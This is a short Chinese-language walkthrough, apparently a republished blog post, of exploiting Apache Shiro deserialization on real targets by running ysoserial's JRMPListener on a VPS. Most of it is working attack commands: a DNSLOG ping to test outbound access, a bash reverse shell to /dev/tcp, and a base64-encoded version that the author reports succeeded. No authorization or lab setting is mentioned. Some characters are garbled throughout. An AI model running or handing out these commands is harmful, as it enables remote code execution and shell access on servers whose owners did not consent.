前言

最近在測試中遇到一些shiro反序列化不能利用的情況 找到key 無法找到利用鏈，但是發(fā)現(xiàn)存在JRMPClient可用的情況。

換一種工具嘗試

發(fā)現(xiàn) JRMPClient 可用， 嘗試使用 JRMPClient 進行測試，最終這個目標也沒有執(zhí)行成功所以換了一個目標進行的嘗試，僅記錄JRMPClient 利用方式。

使用JRMPClient模塊進行測試

找到一個同樣存在shiro反序列的目標。

同樣find: JRMPClient can be use。

搭建JRMPClient 監(jiān)聽服務(wù)

首先需要搭建 JRMPClient 使用ysoserial.jar 工具搭建服務(wù)，下載地址：https://github.com/frohoff/ysoserial

使用DNSLOG進行檢測

在不確定目標是否通外網(wǎng)的情況下 先使用DNSLOG進行檢測 獲取一個新的域名 ：w3dh1h.dnslog.cn

VPS上開啟JRMPListener

在VPS上搭建服務(wù)命令

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "ping w3dh1h.dnslog.cn"

shiro反序列利用工具中選擇JRMPClient,然后輸入VPS上搭建服務(wù)的地址：

JRMPListener 收到返回信息

DNSLOG上收到目標的ping 命令信息 說明目標服務(wù)器通外網(wǎng)

執(zhí)行反彈命令

執(zhí)行反彈命令 bash -i >& /dev/tcp/xxxxxx/8888 0>&1

沒有收到反彈鏈接

將命令進行base64編碼 java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC94eC54eC54eC54eHgvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"

成功收到反彈鏈接

審核編輯：湯梓紅